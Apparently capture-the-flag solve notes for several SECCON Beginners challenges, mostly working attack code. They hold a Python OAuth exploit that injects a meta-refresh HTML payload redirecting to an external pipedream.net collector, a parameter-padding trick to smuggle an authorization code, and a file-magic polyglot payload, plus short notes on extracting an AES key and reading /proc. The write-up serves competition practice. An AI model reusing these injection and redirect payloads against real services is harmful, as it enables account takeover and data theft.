Open the bundled hls.js and set a breakpoint on getDecryptData
Let the first hit pass; on the second hit, inspecting this.key reveals the AES key
Then restore the mp4 with ffmpeg
import requests

# url = "http://localhost:3001/"
# client_url = "http://localhost:3000/"
url = "https://oooauth.beginners.seccon.games:3001/"
client_url = "https://oooauth.beginners.seccon.games:3000/"

ses = requests.Session()
data = {
    "username": "guest",
    "password": "guest",
    "approved": "Approve",
}

# get valid code value: request the auth page with the meta-refresh payload in
# the scopes parameter, then approve as guest without following the redirect
xss = '<meta/http-equiv="refresh"/content="0;https://eo89rba2rkj9j6f.m.pipedream.net">'
res = ses.get(f"{url}auth?response_type=code&client_id=oauth-client&redirect_uri={client_url}callback&scopes={xss}")
res = ses.post(f"{url}approve", data=data, allow_redirects=False)
# the approval redirect carries the authorization code in its Location header
code = res.headers["Location"].split("?code=")[1]
print(code)

# build the final auth URL: the redirect_uri's own query string is padded with
# 997 dummy parameters (and encoded '&' separators) before the code parameter
url = f"{url}auth"
url += "?response_type=code&client_id=oauth-client"
url += "&scopes=hoge"
url += f"&redirect_uri={client_url}callback"
url += "?" + "grant_type%26" + "redirect_uri%26" + "a%26" * 997 + f"code={code}"
print(url)
""" | |
5種類の開始位置が異なる%sを持つマッチパターンをfile -dの出力から頑張って見つけて、polyglotする | |
""" | |
""" | |
0 string PMEM | |
>4 string OBJ | |
>>4096 string >0 \b, obj.layout: '%s' | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/pmem#L44 | |
20 string GPAT GIMP pattern data, | |
>24 string x %s | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/gimp#L47 | |
44 string PTMF Poly Tracker PTM Module | |
>0 string >\32 Title: "%s" | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/audio#L470 | |
60 string RINEX | |
>80 search/256 XXRINEXB RINEX Data, GEO SBAS Broadcast | |
>>&32 string x \b, date %15.15s | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/meteorological#L8 | |
1080 string OKTA 8-channel Octalyzer module sound data | |
!:mime audio/x-mod | |
#audio/x-octalysertracker-module | |
>0 string >\0 Title: "%s" | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/audio#L232 | |
""" | |
payload = "PMEMOBJPDF" | |
payload += "K" * (20 - len(payload)) + "GPAT" + "PNG" | |
payload += "K" * (44 - len(payload)) + "PTMF" + "GIF"+"ELF" | |
payload += "K" * (60 - len(payload)) + "RINEX" + "K" * 20 + "XXRINEXB" + "K" * 32 + "JPEG" | |
# payload += "K" * (0x100 - len(payload)) + "IMA" + "ELF"*10 | |
payload += "K" * (1080 - len(payload)) + "OKTA" | |
payload += "K" * (4096 - len(payload)) + "PNG" | |
payload += "K" * (4990 - len(payload)) | |
payload += "\nQUIT\n" | |
# print(payload) | |
open("exp","w").write(payload) | |
""" | |
$ file -bkr exp | |
RINEX Data, GEO SBAS Broadcast, date JPEGKKKKKKKKKKK, version BJPDFK | |
- Persistent Memory Pool file, type: OBJ, version: 0x4b4b4644, compat: 0x4b4b4b4b, incompat: 0x4b4b4b4b, ro_compat: 0x54415047, crtime: *Invalid time*, alignment_desc: 0x4b4b4b4b4b4b4b47, machine_class: unknown (0x75), data: unknown (0x75), reserved[0]: 75, reserved[1]: 75, reserved[2]: 75, reserved[3]: 75, machine: unknown (0x19275), obj.layout: 'PNGKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK' | |
- 8-channel Octalyzer module sound data Title: "PMEMOBJPDFKKKKKKKKKKGPATPNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKK" | |
- Poly Tracker PTM Module Title: "PMEMOBJPDFKKKKKKKKKKGPATPNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKK" | |
- GIMP pattern data, PNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKKKKKKKKKKKKKKKKKKKKKKKKKK | |
- , ASCII text, with very long lines | |
""" |
See https://linuxjm.osdn.jp/html/LDP_man-pages/man5/proc.5.html
Reading /proc/self/syscall shows that a read syscall is in progress, and its arguments give the fd